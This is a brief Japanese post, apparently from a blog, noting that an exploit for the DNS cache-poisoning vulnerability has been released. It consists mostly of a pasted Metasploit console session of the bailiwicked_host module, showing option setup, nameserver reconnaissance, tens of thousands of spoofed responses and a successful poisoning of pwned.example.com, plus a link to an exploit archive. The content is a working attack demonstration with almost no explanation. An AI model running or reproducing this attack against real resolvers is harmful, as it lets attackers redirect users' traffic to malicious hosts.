DNSのキャッシュの脆弱性のExploitが出ていますねぇ。

msf auxiliary(bailiwicked_host) > set SRCPORT 0
SRCPORT => 0

msf auxiliary(bailiwicked_host) > run
[*] Switching to target port 48178 based on Metasploit service
[*] Targeting nameserver A.B.C.D
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got answer with 2 answers, 0 authorities
[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com.
[*] Querying recon nameserver for address of ns89.worldnic.com....
[*] Got answer with 1 answers, 0 authorities
[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45
[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com....
[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com.
[*] Querying recon nameserver for address of ns90.worldnic.com....
[*] Got answer with 1 answers, 0 authorities
[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45
[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com....
[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_host) >

msf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D
[*] exec: nslookup pwned.example.com A.B.C.D

http://www.milw0rm.com/exploits/6122